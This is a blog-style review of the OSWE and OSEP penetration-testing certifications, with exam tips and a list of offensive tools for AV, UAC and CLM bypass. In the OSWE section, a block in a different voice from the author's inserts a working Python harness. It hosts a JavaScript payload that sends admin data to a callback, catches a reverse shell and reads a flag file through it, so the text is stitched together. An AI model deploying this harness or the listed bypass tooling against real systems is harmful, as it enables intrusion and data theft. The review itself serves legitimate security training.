[Backup] OSEP and OSWE Review
Hello folks, I recently took the OSWE exam. For more information about the course, you can check the official website https://www.offensive-security.com/awae-oswe/. Since I also passed OSEP (https://www.offensive-security.com/pen300-osep/) half a year ago, I would like to share my thoughts and feelings about both. Note that because I passed OSEP half a year ago, I cannot be 100% sure that my personal experience still fully applies, for example whether course content has been added or modified since then. Before reading on, please make sure you already understand the course content of OSWE and OSEP, for example because you are a student preparing for the exam or about to enroll; information that can be found on the official website will not be repeated here. Let me go through them one by one.
OSWE
For me, I was not confident in web application assessment and penetration testing because I have no experience in software development. For web penetration testing, development experience is undoubtedly an advantage when it comes to understanding application architecture, secure code review, etc. The courses I passed previously, such as OSCP, did not explain common web vulnerabilities in depth; most of the time we just needed to use exploits for CVE vulnerabilities to attack a web application. As a penetration tester and red team operator, although I am better at network and infrastructure penetration testing, web application exploitation is always unavoidable, and web exploitation is often the key to getting a foothold in a company's internal network. Therefore, I made up my mind to enroll in OSWE to strengthen my web assessment skills, which is also directly helpful to my current job. OSWE is a 300-series course, and its depth and difficulty are above the web attack part of OSCP. It is a course that focuses on white-box code review and includes a small amount of black-box penetration testing, but reviewing and analyzing code is always expected. If you ask me whether it is helpful for black-box penetration testing, my answer is yes, especially for someone like me without a good web security foundation. I did not even understand common concepts such as CORS, CSRF, deserialization, SSTI, etc. well. Although OSWE is a 300-series course, it still starts from the basics, and these concepts are explained in detail. After understanding the basics and the theory, even in a black-box penetration test you can naturally infer the user input sanitization, code snippets, etc. that may exist in the backend.
Before I enrolled in OSWE I was worried that my skills were insufficient and that I would struggle when going through the materials. I actually did have some difficulty with a few chapters, such as prototype pollution and .NET deserialization, but after going through the materials many times, following the steps, and completing the exercises and extra miles, my skills improved greatly. OSWE currently covers PHP, Java, .NET, NodeJS, and Python web applications, so you need to be able to read code in these languages. In addition, there is a great demand for JavaScript and Python scripting skills, and sometimes it is even necessary to use Java, .NET, or C to create a PoC. Beyond these languages, familiarity with SQL syntax and with BurpSuite is also very important. If you are like me, not very confident about your web security skills but wanting to enroll in OSWE, I still recommend getting familiar with these in advance. Although OSWE teaches many things from the basics, the jump to complex scenarios is quick, because Offsec assumes that you are already familiar with certain knowledge, such as the use of the requests library in Python, SQL syntax, etc. By the way, if you are still not sure whether you meet the minimum requirements for OSWE and budget is not an issue, eLearnSecurity's eWPT (https://elearnsecurity.com/product/ewpt-certification/) can help you fill in most of the required knowledge, because, as I said, although OSWE also covers basic concepts, the jump is relatively quick. Although I did not take the eWPT exam, I spent a few weeks going through the eWPT course materials, and it cleared my mind a lot.
Compared with OSEP and OSED in OSCE3, OSWE has been around for a longer time, so its course content has also been extended and updated, for example with chapters on CSRF, SSRF, prototype pollution, and other vulnerabilities added in the last content extension. The Atmail "from XSS to RCE" chapter has been archived, but students can still access it, so I strongly recommend learning and practicing it like the other chapters. In terms of learning methodology, you must follow the course materials while practicing and coding; it is useless to just read them like articles. Combine the videos and the PDF, concepts and hands-on work, and complete the exercises and extra miles as much as possible. After finishing each chapter, try to create a script that automates all of its steps. During the learning process, you also need to read a lot of articles and official documentation, for example the official documentation of the Express framework, or analysis articles on a specific vulnerability.
OSWE has a total of 3 labs which have no official walkthrough; you are supposed to apply the knowledge you have learned to compromise them. 2 of them are white-box machines and 1 is a black-box machine. Before the exam, make sure you complete at least the 2 white-box labs with different attack paths. Whether you need additional practice before the exam is a matter of opinion, but if you are up for it, here are some recommended resources I have collected personally.
1: HTB OSWE-like boxes https://www.todosec.com/infosec/infosec-topics/boxes/htb/htb-oswe-tjnull
2: https://github.com/rootshooter/oswe-prep-2022
3: https://pentesterlab.com/
4: https://portswigger.net/web-security/all-labs
5: Find some open source web applications and review their source code
If you ask me, I think deeply understanding the 2 white-box labs is enough, but the above exercises can undoubtedly increase your proficiency, so that you can find vulnerabilities and exploit them faster. Next, I will talk about the exam. I will not reveal details of the exam machines, but I will share some personal experience and tips.
Many people, including me, have complained that Offsec's course materials are insufficient to prepare for the exam and that a lot of extra exercises are required, for example for OSCP. For OSWE I don't think so, but this does not mean that reproducing what you learned in the course materials is enough to pass. You still have to think outside the box, read articles, do some extra exercises, and try harder. For example, if the course materials explain XML deserialization attacks in .NET applications, you would want to understand binary deserialization attacks in .NET applications, or deserialization attacks in Java applications, and so on. Maybe the scope will suddenly feel much larger, but as long as you track user input closely and do some research and searching, you will be fine. In the OSWE exam there are 2 applications, each with an authentication bypass phase and an RCE phase, for a total of 4 flags; you can pass with 3 flags, which means you can leave the RCE phase of one application incomplete. Please read the official exam guide (https://help.offensive-security.com/hc/en-us/articles/360046869951-OSWE-Exam-Guide) before the exam. Remember not to download the source code to your local machine during the exam; you are allowed to review source code, debug, and test on the debug machines, which are almost identical to the exam machines but with different credentials, etc. After completing the exploit script, run it against the exam machine to capture the flag. Some people worry about what happens if they cannot find the vulnerability in the source code immediately during the OSWE exam. Next, I will share one of my biggest takeaways from the OSWE exam. I set 4 phases for completing each exam application.
Phase 1: Discovery of Vulnerabilities in Source Code
Phase 2: Construct an exploitation chain in theory
Phase 3: Able to compromise the target with user interaction, such as using burpsuite to modify the request to get RCE
Phase 4: Write a script to automate all the steps and get RCE
There is a big gap between each pair of phases! Therefore, do not relax right after finding the vulnerability, because you are still far from the end. For me, getting 3 flags in the exam is not very difficult, but it still took me a long time, because before reaching phase 4 I kept running into unexpected problems, such as syntax errors, an unstable network connection, RCE without a shell, etc. An unstable network connection is beyond our control, so I suggest running the exploit script on a debug machine after completing it. Attacking through OpenVPN from your Kali, you may encounter weird issues caused by the unstable connection. The exploit scripts submitted for the exam are judged very strictly and must be fully automated without any user interaction, so you must be very careful about every step, including starting the Apache server, printing the flags, etc.
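As an added illustration of phase 4 (this is my own example, not the author's exam script and not tied to any exam application), here is a small stdlib-only harness for the two steps that are easiest to get wrong in an unattended run: bringing up the server that hosts a staged payload yourself instead of remembering to start Apache, and catching the shell and reading the flag from it without anyone typing. The target is replaced by a simulated victim so the script runs offline; `PAYLOAD`, the flag path `/root/proof.txt`, the sentinel marker and every function name are placeholders I chose, not values from the course or exam.

```python
"""Unattended exploit-chain harness: added example, not the author's exam script.
A web server for a staged payload plus a listener that catches the reverse shell,
reads the flag and returns it with nobody at the keyboard. The victim is simulated
so it runs offline; the flag path and the JavaScript are placeholders."""
import http.client
import socket
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlsplit

DONE_MARKER = b"__CHAIN_DONE__"  # tells us the command's output is complete
# Constructed placeholder for the JavaScript an XSS stage would load.
PAYLOAD = b"fetch('/admin/users').then(r => r.text()).then(t => fetch('/cb?d=' + btoa(t)))"


class PayloadServer:
    """Serve one in-memory payload on a daemon thread (replaces 'start Apache')."""
    def __init__(self, body, bind_host="0.0.0.0", port=0):
        class Handler(BaseHTTPRequestHandler):
            def do_GET(self):
                self.send_response(200)
                self.send_header("Content-Type", "application/javascript")
                self.send_header("Content-Length", str(len(body)))
                self.end_headers()
                self.wfile.write(body)

        self.httpd = HTTPServer((bind_host, port), Handler)
        self.port = self.httpd.server_address[1]  # port=0 lets the OS choose
        threading.Thread(target=self.httpd.serve_forever, daemon=True).start()

    def stop(self):
        self.httpd.shutdown()
        self.httpd.server_close()


class ShellCatcher:
    """Accept one reverse shell, run one command through it, collect its output."""
    def __init__(self, command, bind_host="0.0.0.0", port=0, timeout=30):
        self.timeout, self.output = timeout, None
        # Split the marker with "" so the literal never appears on the command line:
        # an interactive sh echoes its input, and a verbatim marker there would make
        # us stop reading before the real output arrives.
        self.line = b'%s; echo "%s""%s"\n' % (command.encode(), DONE_MARKER[:6], DONE_MARKER[6:])
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((bind_host, port))
        self.sock.listen(1)
        self.sock.settimeout(timeout)
        self.port = self.sock.getsockname()[1]
        self._thread = threading.Thread(target=self._serve, daemon=True)
        self._thread.start()

    def _serve(self):
        try:
            conn, _ = self.sock.accept()
        except socket.timeout:
            return  # no callback before the deadline: output stays None
        with conn:
            conn.settimeout(self.timeout)
            conn.sendall(self.line)
            buf = b""
            while DONE_MARKER not in buf:
                chunk = conn.recv(4096)
                if not chunk:
                    break
                buf += chunk
        text = buf.split(DONE_MARKER, 1)[0].decode(errors="replace")
        echoed = self.line.decode().strip()  # drop the echoed command and blank lines
        self.output = "\n".join(l for l in text.splitlines() if l.strip() and l.strip() != echoed)

    def wait(self):
        self._thread.join(self.timeout + 1)
        self.sock.close()
        return self.output


def run_chain(trigger, payload, flag_command, lhost, bind_host="0.0.0.0", timeout=30):
    """Start the infrastructure, fire the app-specific trigger, return the flag or None."""
    server = PayloadServer(payload, bind_host)
    catcher = ShellCatcher(flag_command, bind_host, timeout=timeout)
    try:
        trigger(f"http://{lhost}:{server.port}/x.js", lhost, catcher.port)
        return catcher.wait()
    finally:
        server.stop()


def simulated_victim(payload_url, lhost, lport):
    """Constructed stand-in for the target: fetches the staged payload like a
    browser, then connects back like an interactive sh that echoes its input."""
    u = urlsplit(payload_url)
    web = http.client.HTTPConnection(u.hostname, u.port, timeout=5)
    web.request("GET", u.path)
    if web.getresponse().read() != PAYLOAD:
        raise RuntimeError("payload stage is not being served")
    with socket.create_connection((lhost, lport), timeout=5) as s:
        line = s.makefile("rb").readline()  # our command, as a tty would echo it
        s.sendall(line + b"FLAG{constructed-example}\n" + DONE_MARKER + b"\n")


def demo():
    """Offline end-to-end run; in the exam the trigger sends the real requests."""
    return run_chain(simulated_victim, PAYLOAD, "cat /root/proof.txt", "127.0.0.1",
                     bind_host="127.0.0.1", timeout=10)
```

In a real run, `simulated_victim` is replaced by a function that performs the authentication bypass and fires the RCE using the `payload_url`, `lhost` and `lport` it is handed; everything else stays the same, and `run_chain` returns `None` instead of hanging if the shell never calls back, which is the signal to look at the network rather than the code. The split sentinel and the filtering of the echoed command line exist because an interactive `sh -i` shell echoes what you send it and prints prompts; a non-interactive `nc -e` style shell does neither, and the filter is harmless there. A Windows target would need a `cmd`-compatible echo instead of the POSIX one shown.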
If you ask me whether OSWE is helpful for real-world web white-box assessment, it must be very helpful. For example, it will definitely be much easier for you to review some open source web applications on GitHub and get your own CVE. Well, that finishes the OSWE part; let's talk about OSEP.
OSEP
I passed the OSEP exam on my second attempt half a year ago. Although it was a while ago, I still have some impressions. OSEP is also a 300-series course and the successor of OSCP, so it has a higher level of difficulty and depth. For details, please check the official website (https://www.offensive-security.com/pen300-osep/). OSEP is positioned as an advanced penetration testing course, but it also contains a lot of content from the red teaming realm, such as phishing, C2, antivirus evasion, etc. However, OSEP does not focus on OPSEC the way CRTO does. In OSEP, Active Directory exploitation is a main part, and most of the labs and the exam are in Active Directory infrastructure, so if you have a good understanding of Active Directory exploitation before learning OSEP, it will be a great advantage. OSCP also covers AD exploitation, but only superficially. To become familiar with AD concepts and exploitation, CRTO from ZeroPoint Security (https://training.zeropointsecurity.co.uk/courses/red-team-ops) and CRTP from Pentester Academy (https://www.pentesteracademy.com/activedirectorylab) are good choices. Besides, HTB and TryHackMe also have AD modules, which can help you quickly get used to penetration testing in an AD environment.
The skills taught in OSEP are especially helpful in these areas: external and internal network penetration testing, infrastructure penetration testing, and red team ops. Although you may need to exploit web applications, since OSEP is not focused on web penetration testing, the web exploitation will not be very difficult. It is worth noting that because OSEP is the successor of OSCP, OSEP assumes you have mastered the knowledge in OSCP, such as multiple ways to get a reverse shell, enumeration and exploitation of SMB services, etc. The OSEP PDF has 700+ pages, second only to the OSCP PDF. Unlike OSCP, OSEP focuses more on internals theory and on programming to create your own tradecraft, such as C# implementations of PrintSpoofer and PsExec. Therefore, although OSEP is not a code review course like OSWE, students still need to review and write code frequently. Before enrolling in OSEP, it is better if you have some understanding of the Win32 API, reverse engineering, C#, and C/C++. It doesn't matter much if you don't, because the code style of tradecraft is different from that of production software. In addition to AD exploitation, another important part of OSEP is evasion and breaching defenses. Apart from AV evasion, you are also expected to bypass various security controls like AppLocker, AMSI, CLM, network segmentation, restrictive environments, etc. Therefore, while attacking targets and expanding our foothold, we must also avoid detection and bypass security controls. Fortunately, at least in the context of OSEP, these security controls are fragile as long as you know how to handle them.
The OSEP course includes 6 labs. Of course, the lab of each chapter is also a playground for us. 4 of the labs are AD environments of different sizes. I recommend completing them with multiple attack paths and different C2s. You should also complete all exercises and extra miles. So, once you have completed all the labs and exercises, how do you prepare for the exam?
As I said previously, OSWE is one of the exceptions among Offsec courses in that the course materials are sufficient for the exam. Unfortunately, I don't think that applies to OSEP. To pass the OSEP exam, you are expected to have decent theory and knowledge, to read lots of articles, and to do a certain amount of research and some extra exercises. Or we can say that the OSEP course materials are sufficient for the exam, but Offsec assumes that you have already mastered a lot of skills. If you want to be more ready when taking the exam, the following are my personally recommended exam preparation resources:
1: PentesterAcademy’s CRTE course (https://www.pentesteracademy.com/redteamlab)
2: ZeroPoint Security’s CRTO course
3: HackTheBox Pro Lab Cybernetics (https://www.hackthebox.com/newsroom/prolab-cybernetics)
CRTE and CRTO are guided courses and labs, whereas Pro Lab Cybernetics is far closer to the OSEP exam, and it is much more difficult than OSEP. So if you complete Cybernetics, the OSEP exam won't be a problem for you. Next, I will talk about my thoughts and tips related to the exam. I will not disclose details of the exam machines either.
The OSEP exam environment is the network infrastructure of a fictitious enterprise with multiple domains. You capture the secret flag on a specific host or collect 10 flags to pass (https://help.offensive-security.com/hc/en-us/articles/360050293792-OSEP-Exam-Guide); some people say that both ways require similar effort, so do not expect a shortcut. Although I didn't capture the secret flag, I feel that is the case. In the OSEP exam, students have more freedom in the choice of tools: everything except commercial tools is allowed, including sqlmap and Metasploit, which are restricted in OSCP. Therefore, please be sure to prepare your toolset before the OSEP exam; of all Offsec courses, the OSEP exam depends the most on your personal toolset. In the OSEP course PDF, to help students understand system internals better, many tools are written by the students themselves, such as a C# implementation of an MSSQL client. But in the exam, please be sure to pick handier tools. The following is an incomplete list of the tools I recommend:
1: GhostPack toolset (https://github.com/GhostPack), including Rubeus, Seatbelt and other C# tools. Very handy!
2: PowerUpSQL (https://github.com/NetSPI/PowerUpSQL), enumerate and exploit MSSQL databases
3: Impacket toolset (https://github.com/SecureAuthCorp/impacket); psexec, mssqlclient, etc. are very powerful and decent tools. Very handy!
4: evil-winrm, remote access to the WinRM service; Kali includes it by default.
5: clm-bypass (https://github.com/calebstewart/bypass-clm), bypasses CLM and spawns an interactive PowerShell session
6: PrintSpoofer (https://github.com/itm4n/PrintSpoofer), abuses SeImpersonatePrivilege while the Print Spooler service (spoolsv) is running
7: SweetPotato (https://github.com/CCob/SweetPotato), provides a variety of methods to abuse SeImpersonatePrivilege, even when spoolsv is stopped
8: SharPyShell (https://github.com/antonioCoco/SharPyShell), a semi-interactive .NET webshell that can bypass antivirus
9: KeyTabExtract (https://github.com/sosdave/KeyTabExtract), extracts credentials from keytab files
10: xfreerdp, remote access over RDP, supports pass-the-hash
11: BloodHound.py (https://github.com/fox-it/BloodHound.py), the Python BloodHound collector, which can gather domain object data from Kali
12: PsExec, a tool signed by Microsoft
13: Apart from Metasploit, try some other C2 like Sliver (https://github.com/BishopFox/sliver)
14: CME (https://github.com/Porchetta-Industries/CrackMapExec), which has now become a toolset like impacket and can be used for password spraying and permission checks. Very handy!
15: UACME (https://github.com/hfiref0x/UACME), still-usable UAC bypasses
16: RunasCs (https://github.com/antonioCoco/RunasCs), provide credentials and execute commands as that user
…………
As you all know, at the end of last year a student leaked OSEP exam sets and their walkthroughs, which forced Offsec to replace all leaked OSEP exam sets with new ones, and according to many students' feedback the difficulty increased a lot. It is unfortunate news and we can't change it, but we can become stronger and nail the exam. In addition to the tools recommended above, I also have several tactical suggestions:
1: After getting the initial foothold, don't rush to continue exploiting or moving laterally. Enumerate everything you can. For example: domain users? domain machines? their IPs? readable/writable SMB shares? MSSQL instances? security controls in place?
2: Always assume all security controls are in place on your target hosts, such as AV, AppLocker, UAC, etc., and take the corresponding bypasses into consideration when delivering payloads.
3: Don't forget what you learned in OSCP, such as insecure PHP file upload, anonymous FTP access, exploitation of CVE vulnerabilities, etc.
4: OSEP focuses on AD exploitation and security control bypass, but not only these two! Web application exploitation, network service attacks, common misconfigurations, etc. are also important.
5: Abandon some CTF or OSCP mindsets, for example that local privilege escalation must be done before moving to the next target.
6: Some other reference resources
https://github.com/chvancooten/OSEP-Code-Snippets
https://www.ired.team/
https://book.hacktricks.xyz/welcome/readme
Is OSEP helpful for real-world penetration tests and red team ops? I think it helps a lot; many of the techniques can be applied on the most up-to-date OS, such as CLM bypass, AMSI bypass, MSSQL exploitation, etc. However, a few topics in OSEP are not up to date enough, such as domain fronting and antivirus evasion. Take AV evasion as an example: the evasion methods mentioned in OSEP are still superficial. Even if you apply all the evasion methods taught in OSEP to your tradecraft, it will be flagged immediately by most AV products. Since OSEP came out in 2020, that is understandable. Anyway, OSEP provides a good learning and research direction and mindset; it is not difficult to evade today's AV products as long as you do some exploration and research.
Alright, let's wrap up today's review. I hope everybody enjoys the courses and nails the exam!